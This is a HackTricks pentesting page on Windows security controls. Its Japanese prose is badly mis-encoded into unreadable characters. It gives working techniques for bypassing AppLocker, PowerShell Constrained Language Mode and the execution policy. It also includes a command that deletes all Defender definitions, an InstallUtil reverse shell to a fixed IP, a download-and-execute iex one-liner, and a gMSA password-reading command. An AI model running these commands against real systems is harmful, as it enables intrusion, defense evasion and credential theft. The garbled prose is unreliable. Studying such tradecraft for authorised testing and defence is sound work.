22 KiB
Windows Security Controls
{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the ð¬ Discord group or the telegram group or follow us on Twitter ðŠ @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Use Trickest to easily build and automate workflows powered by the world's most advanced community tools.
Get Access Today:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
AppLocker Policy
ã¢ããªã±ãŒã·ã§ã³ãã¯ã€ããªã¹ãã¯ãã·ã¹ãã äžã§ååšãå®è¡ãããããšãèš±å¯ãããæ¿èªæžã¿ã®ãœãããŠã§ã¢ã¢ããªã±ãŒã·ã§ã³ãŸãã¯å®è¡å¯èœãã¡ã€ã«ã®ãªã¹ãã§ããç®çã¯ãç°å¢ãæ害ãªãã«ãŠã§ã¢ããçµç¹ã®ç¹å®ã®ããžãã¹ããŒãºã«åèŽããªãæªæ¿èªã®ãœãããŠã§ã¢ããä¿è·ããããšã§ãã
AppLockerã¯ããã€ã¯ããœããã®ã¢ããªã±ãŒã·ã§ã³ãã¯ã€ããªã¹ããœãªã¥ãŒã·ã§ã³ã§ãããã·ã¹ãã 管çè
ã«ãŠãŒã¶ãŒãå®è¡ã§ããã¢ããªã±ãŒã·ã§ã³ããã¡ã€ã«ãå¶åŸ¡ããæš©éãäžããŸããããã¯ãå®è¡å¯èœãã¡ã€ã«ãã¹ã¯ãªãããWindowsã€ã³ã¹ããŒã©ãŒãã¡ã€ã«ãDLLãããã±ãŒãžã¢ããªãããã¯ãããã¢ããªã€ã³ã¹ããŒã©ãŒã«å¯ŸããŠè©³çŽ°ãªå¶åŸ¡ãæäŸããŸãã
çµç¹ãcmd.exeãPowerShell.exeããããã¯ããç¹å®ã®ãã£ã¬ã¯ããªãžã®æžã蟌ã¿ã¢ã¯ã»ã¹ãå¶éããããšã¯äžè¬çã§ããããããã¯ãã¹ãŠåé¿å¯èœã§ãã
Check
ãã©ãã¯ãªã¹ã/ãã¯ã€ããªã¹ãã«ç»é²ãããŠãããã¡ã€ã«/æ¡åŒµåã確èªããŸã:
Get-ApplockerPolicy -Effective -xml
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
$a = Get-ApplockerPolicy -effective
$a.rulecollections
ãã®ã¬ãžã¹ããªãã¹ã«ã¯ãAppLockerã«ãã£ãŠé©çšãããæ§æãšããªã·ãŒãå«ãŸããŠãããã·ã¹ãã äžã§åŒ·å¶ãããŠããçŸåšã®ã«ãŒã«ã»ããã確èªããæ¹æ³ãæäŸããŸãïŒ
HKLM\Software\Policies\Microsoft\Windows\SrpV2
ãã€ãã¹
- AppLockerããªã·ãŒããã€ãã¹ããããã®äŸ¿å©ãªæžã蟌ã¿å¯èœãã©ã«ããŒïŒAppLockerã
C:\Windows\System32
ãŸãã¯C:\Windows
å ã®ä»»æã®ãã®ãå®è¡ããããšãèš±å¯ããŠããå Žåããã®ãã€ãã¹ã«äœ¿çšã§ããæžã蟌ã¿å¯èœãã©ã«ããŒããããŸãã
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\System32\spool\drivers\color
C:\Windows\Tasks
C:\windows\tracing
- äžè¬çã«ä¿¡é Œããã"LOLBAS's"ãã€ããªã¯ãAppLockerããã€ãã¹ããã®ã«ã圹ç«ã¡ãŸãã
- äžé©åã«æžãããã«ãŒã«ããã€ãã¹ãããå¯èœæ§ããããŸã
- äŸãã°ã
<FilePathCondition Path="%OSDRIVE%*\allowed*"/>
ãã©ãã«ã§ã**allowed
ãšãããã©ã«ããŒãäœæ**ããã°èš±å¯ãããŸãã - çµç¹ã¯ãã°ãã°**
%System32%\WindowsPowerShell\v1.0\powershell.exe
å®è¡å¯èœãã¡ã€ã«ããããã¯ããããšã«çŠç¹ãåœãŠãŸãããä»ã®PowerShellå®è¡å¯èœãã¡ã€ã«ã®å ŽæïŒäŸïŒ%SystemRoot%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
ãPowerShell_ISE.exe
ïŒãå¿ããã¡ã§ãã - DLLã®åŒ·å¶ã¯éåžžã«çšã«æå¹ã§ãããã·ã¹ãã ã«ãããè¿œå ã®è² è·ããäœãå£ããªãããšã確èªããããã«å¿ èŠãªãã¹ãã®éãçç±ã§ãããããã£ãŠãDLLãããã¯ãã¢ãšããŠäœ¿çšããããšã§AppLockerããã€ãã¹ããã®ã«åœ¹ç«ã¡ãŸãã
- ReflectivePickãSharpPickã䜿çšããŠãä»»æã®ããã»ã¹ã§Powershellã³ãŒããå®è¡ããAppLockerããã€ãã¹ããããšãã§ããŸãã詳现ã«ã€ããŠã¯ããã¡ãã確èªããŠãã ããã
è³æ Œæ å ±ã®ä¿å
ã»ãã¥ãªãã£ã¢ã«ãŠã³ããããŒãžã£ãŒ (SAM)
ããŒã«ã«è³æ Œæ å ±ã¯ãã®ãã¡ã€ã«ã«ååšãããã¹ã¯ãŒãã¯ããã·ã¥åãããŠããŸãã
ããŒã«ã«ã»ãã¥ãªãã£æ©é¢ (LSA) - LSASS
è³æ Œæ
å ±ïŒããã·ã¥åããããã®ïŒã¯ãã·ã³ã°ã«ãµã€ã³ãªã³ã®çç±ã§ãã®ãµãã·ã¹ãã ã®ã¡ã¢ãªã«ä¿åãããŸãã
LSAã¯ããŒã«ã«ã®ã»ãã¥ãªãã£ããªã·ãŒïŒãã¹ã¯ãŒãããªã·ãŒããŠãŒã¶ãŒæš©éãªã©ïŒãèªèšŒãã¢ã¯ã»ã¹ ããŒã¯ã³ã管çããŸãã
LSAã¯ãSAMãã¡ã€ã«å
ã®æäŸãããè³æ Œæ
å ±ã確èªãïŒããŒã«ã«ãã°ã€ã³çšïŒããã¡ã€ã³ãŠãŒã¶ãŒãèªèšŒããããã«ãã¡ã€ã³ã³ã³ãããŒã©ãŒãšéä¿¡ããŸãã
è³æ Œæ å ±ã¯ããã»ã¹LSASSå ã«ä¿åãããŸãïŒKerberosãã±ãããNTããã³LMã®ããã·ã¥ãç°¡åã«åŸ©å·åå¯èœãªãã¹ã¯ãŒãã
LSAã·ãŒã¯ã¬ãã
LSAã¯ãã£ã¹ã¯ã«ããã€ãã®è³æ Œæ å ±ãä¿åããããšããããŸãïŒ
- Active Directoryã®ã³ã³ãã¥ãŒã¿ã¢ã«ãŠã³ãã®ãã¹ã¯ãŒãïŒå°éäžå¯èœãªãã¡ã€ã³ã³ã³ãããŒã©ãŒïŒã
- WindowsãµãŒãã¹ã®ã¢ã«ãŠã³ãã®ãã¹ã¯ãŒã
- ã¹ã±ãžã¥ãŒã«ãããã¿ã¹ã¯ã®ãã¹ã¯ãŒã
- ãã®ä»ïŒIISã¢ããªã±ãŒã·ã§ã³ã®ãã¹ã¯ãŒããªã©...ïŒ
NTDS.dit
ããã¯Active Directoryã®ããŒã¿ããŒã¹ã§ãããã¡ã€ã³ã³ã³ãããŒã©ãŒã«ã®ã¿ååšããŸãã
ãã£ãã§ã³ããŒ
Microsoft Defenderã¯ãWindows 10ããã³Windows 11ããããŠWindows Serverã®ããŒãžã§ã³ã§å©çšå¯èœãªã¢ã³ããŠã€ã«ã¹ã§ããäžè¬çãªãã³ãã¹ãããŒã«ïŒäŸïŒWinPEAS
ïŒããããã¯ããŸãããããããããã®ä¿è·ããã€ãã¹ããæ¹æ³ããããŸãã
ãã§ãã¯
Defenderã®ã¹ããŒã¿ã¹ã確èªããã«ã¯ãPSã³ãã³ãã¬ãã**Get-MpComputerStatus
ãå®è¡ã§ããŸãïŒRealTimeProtectionEnabled
**ã®å€ã確èªããŠãã¢ã¯ãã£ããã©ãããç¥ããŸãïŒïŒ
PS C:\> Get-MpComputerStatus
[...]
AntispywareEnabled : True
AntispywareSignatureAge : 1
AntispywareSignatureLastUpdated : 12/6/2021 10:14:23 AM
AntispywareSignatureVersion : 1.323.392.0
AntivirusEnabled : True
[...]
NISEnabled : False
NISEngineVersion : 0.0.0.0
[...]
RealTimeProtectionEnabled : True
RealTimeScanDirection : 0
PSComputerName :
åæããã«ã¯ã次ã®ã³ãã³ããå®è¡ããããšãã§ããŸãïŒ
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
wmic /namespace:\\root\securitycenter2 path antivirusproduct
sc query windefend
#Delete all rules of Defender (useful for machines without internet access)
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Encrypted File System (EFS)
EFSã¯ã察称éµã§ãããã¡ã€ã«æå·åéµïŒFEKïŒã䜿çšããŠãã¡ã€ã«ãæå·åããããšã§ä¿è·ããŸãããã®éµã¯ãŠãŒã¶ãŒã®å ¬ééµã§æå·åãããæå·åããããã¡ã€ã«ã®$EFS 代æ¿ããŒã¿ã¹ããªãŒã å ã«ä¿åãããŸãã埩å·ãå¿ èŠãªå ŽåããŠãŒã¶ãŒã®ããžã¿ã«èšŒææžã®å¯Ÿå¿ããç§å¯éµã䜿çšããŠ$EFSã¹ããªãŒã ããFEKã埩å·ããŸãã詳现ã¯ãã¡ãã§ç¢ºèªã§ããŸãã
ãŠãŒã¶ãŒã®æäœãªãã§ã®åŸ©å·ã·ããªãªã«ã¯ä»¥äžãå«ãŸããŸãïŒ
- ãã¡ã€ã«ããã©ã«ããŒãFAT32ã®ãããªéEFSãã¡ã€ã«ã·ã¹ãã ã«ç§»åããããšãèªåçã«åŸ©å·ãããŸãã
- SMB/CIFSãããã³ã«ãä»ããŠãããã¯ãŒã¯äžã§éä¿¡ãããæå·åãã¡ã€ã«ã¯ãéä¿¡åã«åŸ©å·ãããŸãã
ãã®æå·åæ¹æ³ã«ãããææè ã¯æå·åããããã¡ã€ã«ã«ééçã«ã¢ã¯ã»ã¹ã§ããŸãããã ããææè ã®ãã¹ã¯ãŒããåã«å€æŽããŠãã°ã€ã³ããã ãã§ã¯åŸ©å·ã¯èš±å¯ãããŸããã
éèŠãªãã€ã³ãïŒ
- EFSã¯ããŠãŒã¶ãŒã®å ¬ééµã§æå·åããã察称FEKã䜿çšããŸãã
- 埩å·ã«ã¯ãŠãŒã¶ãŒã®ç§å¯éµã䜿çšããŠFEKã«ã¢ã¯ã»ã¹ããŸãã
- FAT32ãžã®ã³ããŒããããã¯ãŒã¯éä¿¡ãªã©ãç¹å®ã®æ¡ä»¶äžã§èªåçã«åŸ©å·ãè¡ãããŸãã
- æå·åããããã¡ã€ã«ã¯ãè¿œå ã®æé ãªãã§ææè ãã¢ã¯ã»ã¹ã§ããŸãã
EFSæ å ±ã®ç¢ºèª
ãã®ãµãŒãã¹ã䜿çšãããã©ããã確èªããã«ã¯ããã®ãã¹ãååšããã確èªããŸãïŒC:\users\<username>\appdata\roaming\Microsoft\Protect
ãã¡ã€ã«ãžã®ã¢ã¯ã»ã¹æš©ã確èªããã«ã¯ãcipher /c <file>\ã䜿çšããŸãããã©ã«ããŒå
ã§cipher /e
ããã³cipher /d
ã䜿çšããŠããã¹ãŠã®ãã¡ã€ã«ãæå·åããã³åŸ©å·ããããšãã§ããŸãã
EFSãã¡ã€ã«ã®åŸ©å·
æš©éã®ããã·ã¹ãã ã§ããããš
ãã®æ¹æ³ã§ã¯ã被害è
ãŠãŒã¶ãŒããã¹ãå
ã§ããã»ã¹ãå®è¡ããŠããå¿
èŠããããŸãããã®å Žåãmeterpreter
ã»ãã·ã§ã³ã䜿çšããŠãŠãŒã¶ãŒã®ããã»ã¹ã®ããŒã¯ã³ãåœè£
ããããšãã§ããŸãïŒincognito
ã®impersonate_token
ïŒããŸãã¯ããŠãŒã¶ãŒã®ããã»ã¹ã«migrate
ããããšãã§ããŸãã
ãŠãŒã¶ãŒã®ãã¹ã¯ãŒããç¥ã£ãŠããããš
{% embed url="https://github.com/gentilkiwi/mimikatz/wiki/howto-~-decrypt-EFS-files" %}
Group Managed Service Accounts (gMSA)
Microsoftã¯ãITã€ã³ãã©ã¹ãã©ã¯ãã£ã«ããããµãŒãã¹ã¢ã«ãŠã³ãã®ç®¡çãç°¡çŽ åããããã«**ã°ã«ãŒã管çãµãŒãã¹ã¢ã«ãŠã³ãïŒgMSAïŒ**ãéçºããŸãããåŸæ¥ã®ãµãŒãã¹ã¢ã«ãŠã³ãã¯ããã¹ã¯ãŒãã¯æéåãã«ãªããªããèšå®ãæå¹ã§ããããšãå€ãã®ã«å¯ŸããgMSAã¯ããå®å šã§ç®¡çãããããœãªã¥ãŒã·ã§ã³ãæäŸããŸãïŒ
- èªåãã¹ã¯ãŒã管çïŒgMSAã¯ããã¡ã€ã³ãŸãã¯ã³ã³ãã¥ãŒã¿ããªã·ãŒã«å¿ããŠèªåçã«å€æŽãããè€éãª240æåã®ãã¹ã¯ãŒãã䜿çšããŸãããã®ããã»ã¹ã¯Microsoftã®ããŒé åžãµãŒãã¹ïŒKDCïŒã«ãã£ãŠåŠçãããæåã§ã®ãã¹ã¯ãŒãæŽæ°ãäžèŠã«ãªããŸãã
- 匷åãããã»ãã¥ãªãã£ïŒãããã®ã¢ã«ãŠã³ãã¯ããã¯ã¢ãŠãã«å¯ŸããŠå ç«ãããã察話çãã°ã€ã³ã«äœ¿çšã§ããªããããã»ãã¥ãªãã£ãåäžããŸãã
- è€æ°ãã¹ãã®ãµããŒãïŒgMSAã¯è€æ°ã®ãã¹ãã§å ±æã§ãããããè€æ°ã®ãµãŒããŒã§å®è¡ããããµãŒãã¹ã«æé©ã§ãã
- ã¹ã±ãžã¥ãŒã«ãããã¿ã¹ã¯ã®å®è¡èœåïŒç®¡çããããµãŒãã¹ã¢ã«ãŠã³ããšã¯ç°ãªããgMSAã¯ã¹ã±ãžã¥ãŒã«ãããã¿ã¹ã¯ã®å®è¡ããµããŒãããŸãã
- ç°¡çŽ åãããSPN管çïŒã³ã³ãã¥ãŒã¿ã®sAMaccountã®è©³çŽ°ãDNSåã«å€æŽããã£ãå Žåãã·ã¹ãã ã¯èªåçã«ãµãŒãã¹ããªã³ã·ãã«åïŒSPNïŒãæŽæ°ããSPN管çãç°¡çŽ åããŸãã
gMSAã®ãã¹ã¯ãŒãã¯LDAPããããã£_msDS-ManagedPassword_ã«ä¿åããããã¡ã€ã³ã³ã³ãããŒã©ãŒïŒDCïŒã«ãã£ãŠ30æ¥ããšã«èªåçã«ãªã»ãããããŸãããã®ãã¹ã¯ãŒãã¯ãMSDS-MANAGEDPASSWORD_BLOBãšããŠç¥ãããæå·åããŒã¿ãããã§ãããèªå¯ããã管çè ãšgMSAãã€ã³ã¹ããŒã«ãããŠãããµãŒããŒã®ã¿ãååŸã§ããŸããããã«ãããå®å šãªç°å¢ã確ä¿ãããŸãããã®æ å ±ã«ã¢ã¯ã»ã¹ããã«ã¯ãLDAPSã®ãããªå®å šãªæ¥ç¶ãå¿ èŠã§ããããæ¥ç¶ã¯ãSealing & Secureãã§èªèšŒãããå¿ èŠããããŸãã
ãã®ãã¹ã¯ãŒãã¯GMSAPasswordReader**ã䜿çšããŠèªã¿åãããšãã§ããŸãã
/GMSAPasswordReader --AccountName jkohler
ãã®æçš¿ã§è©³çŽ°æ å ±ãèŠã€ãã
ãŸããgMSAã®ãã¹ã¯ãŒããèªã¿åãããã®NTLMãªã¬ãŒæ»æãå®è¡ããæ¹æ³ã«ã€ããŠã¯ããã®ãŠã§ãããŒãžã確èªããŠãã ããã
LAPS
**ããŒã«ã«ç®¡çè ãã¹ã¯ãŒããœãªã¥ãŒã·ã§ã³ (LAPS)**ã¯ãMicrosoftããããŠã³ããŒãå¯èœã§ãããŒã«ã«ç®¡çè ãã¹ã¯ãŒãã®ç®¡çãå¯èœã«ããŸãããããã®ãã¹ã¯ãŒãã¯ãã©ã³ãã åããããŠããŒã¯ã§ãå®æçã«å€æŽãããActive Directoryã«äžå€®éæš©çã«ä¿åãããŸãããããã®ãã¹ã¯ãŒããžã®ã¢ã¯ã»ã¹ã¯ãACLãéããŠèªå¯ããããŠãŒã¶ãŒã«å¶éãããŠããŸããååãªæš©éãä»äžããããšãããŒã«ã«ç®¡çè ãã¹ã¯ãŒããèªã¿åãèœåãæäŸãããŸãã
{% content-ref url="../active-directory-methodology/laps.md" %} laps.md {% endcontent-ref %}
PSå¶çŽä»ãèšèªã¢ãŒã
PowerShell å¶çŽä»ãèšèªã¢ãŒãã¯ãCOMãªããžã§ã¯ãã®ãããã¯ãæ¿èªããã.NETã¿ã€ãã®ã¿ã®èš±å¯ãXAMLããŒã¹ã®ã¯ãŒã¯ãããŒãPowerShellã¯ã©ã¹ãªã©ãPowerShellãå¹æçã«äœ¿çšããããã«å¿ èŠãªå€ãã®æ©èœãå¶éããŸãã
確èª
$ExecutionContext.SessionState.LanguageMode
#Values could be: FullLanguage or ConstrainedLanguage
ãã€ãã¹
#Easy bypass
Powershell -version 2
çŸåšã®Windowsã§ã¯ããã®ãã€ãã¹ã¯æ©èœããŸãããã PSByPassCLMã䜿çšã§ããŸãã
ã³ã³ãã€ã«ããã«ã¯ 次ã®ããšãå¿
èŠã§ã åç
§ãè¿œå -> åç
§ -> åç
§ -> C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0\31bf3856ad364e35\System.Management.Automation.dll
ãè¿œå ãããããžã§ã¯ãã.Net4.5ã«å€æŽããŸãã
çŽæ¥ãã€ãã¹:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=true /U c:\temp\psby.exe
ãªããŒã¹ã·ã§ã«:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=true /revshell=true /rhost=10.10.13.206 /rport=443 /U c:\temp\psby.exe
ReflectivePick ãŸã㯠SharpPick ã䜿çšããŠãä»»æã®ããã»ã¹ã§ Powershell ã³ãŒãã å®è¡ ããå¶çŽã¢ãŒããåé¿ã§ããŸãã詳现ã«ã€ããŠã¯ã次ã確èªããŠãã ãã: https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-modeã
PS å®è¡ããªã·ãŒ
ããã©ã«ãã§ã¯ å¶éä»ã ã«èšå®ãããŠããŸãããã®ããªã·ãŒãåé¿ããäž»ãªæ¹æ³:
1º Just copy and paste inside the interactive PS console
2º Read en Exec
Get-Content .runme.ps1 | PowerShell.exe -noprofile -
3º Read and Exec
Get-Content .runme.ps1 | Invoke-Expression
4º Use other execution policy
PowerShell.exe -ExecutionPolicy Bypass -File .runme.ps1
5º Change users execution policy
Set-Executionpolicy -Scope CurrentUser -ExecutionPolicy UnRestricted
6º Change execution policy for this session
Set-ExecutionPolicy Bypass -Scope Process
7º Download and execute:
powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('http://bit.ly/1kEgbuH')"
8º Use command switch
Powershell -command "Write-Host 'My voice is my passport, verify me.'"
9º Use EncodeCommand
$command = "Write-Host 'My voice is my passport, verify me.'" $bytes = [System.Text.Encoding]::Unicode.GetBytes($command) $encodedCommand = [Convert]::ToBase64String($bytes) powershell.exe -EncodedCommand $encodedCommand
More can be found here
Security Support Provider Interface (SSPI)
ãŠãŒã¶ãŒãèªèšŒããããã«äœ¿çšã§ããAPIã§ãã
SSPIã¯ãéä¿¡ãåžæãã2å°ã®ãã·ã³ã«é©åãªãããã³ã«ãèŠã€ãã責任ããããŸããããã«å¯Ÿããæšå¥šæ¹æ³ã¯Kerberosã§ãã次ã«ãSSPIã¯äœ¿çšãããèªèšŒãããã³ã«ã亀æžããŸãããããã®èªèšŒãããã³ã«ã¯Security Support Provider (SSP)ãšåŒã°ããåWindowsãã·ã³å ã«DLLã®åœ¢ã§ååšããäž¡æ¹ã®ãã·ã³ãåããã®ããµããŒãããå¿ èŠããããŸãã
Main SSPs
- Kerberos: æšå¥šããããã®
- %windir%\Windows\System32\kerberos.dll
- NTLMv1ããã³NTLMv2: äºææ§ã®çç±
- %windir%\Windows\System32\msv1_0.dll
- Digest: WebãµãŒããŒããã³LDAPãMD5ããã·ã¥åœ¢åŒã®ãã¹ã¯ãŒã
- %windir%\Windows\System32\Wdigest.dll
- Schannel: SSLããã³TLS
- %windir%\Windows\System32\Schannel.dll
- Negotiate: 䜿çšãããããã³ã«ã亀æžããããã«äœ¿çšãããŸãïŒKerberosãŸãã¯NTLMãããã©ã«ãã¯KerberosïŒ
- %windir%\Windows\System32\lsasrv.dll
亀æžã¯è€æ°ã®æ¹æ³ãæäŸããããšãã1ã€ã ããæäŸããããšããããŸãã
UAC - User Account Control
User Account Control (UAC)ã¯ãææ Œããã掻åã®ããã®åæããã³ãããæå¹ã«ããæ©èœã§ãã
{% content-ref url="uac-user-account-control.md" %} uac-user-account-control.md {% endcontent-ref %}
Trickestã䜿çšããŠãäžçã§æãé²ãã ã³ãã¥ããã£ããŒã«ã«ãã£ãŠé§åãããã¯ãŒã¯ãããŒãç°¡åã«æ§ç¯ããã³èªååããŸãã
ä»ããã¢ã¯ã»ã¹ãååŸïŒ
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
{% hint style="success" %}
AWSãããã³ã°ãåŠã³ãå®è·µããïŒHackTricks Training AWS Red Team Expert (ARTE)
GCPãããã³ã°ãåŠã³ãå®è·µããïŒHackTricks Training GCP Red Team Expert (GRTE)
HackTricksããµããŒããã
- ãµãã¹ã¯ãªãã·ã§ã³ãã©ã³ã確èªããŠãã ããïŒ
- **ð¬ Discordã°ã«ãŒããŸãã¯Telegramã°ã«ãŒãã«åå ããããTwitter ðŠ @hacktricks_liveããã©ããŒããŠãã ããã
- HackTricksããã³HackTricks Cloudã®GitHubãªããžããªã«PRãæåºããŠãããã³ã°ããªãã¯ãå ±æããŠãã ããã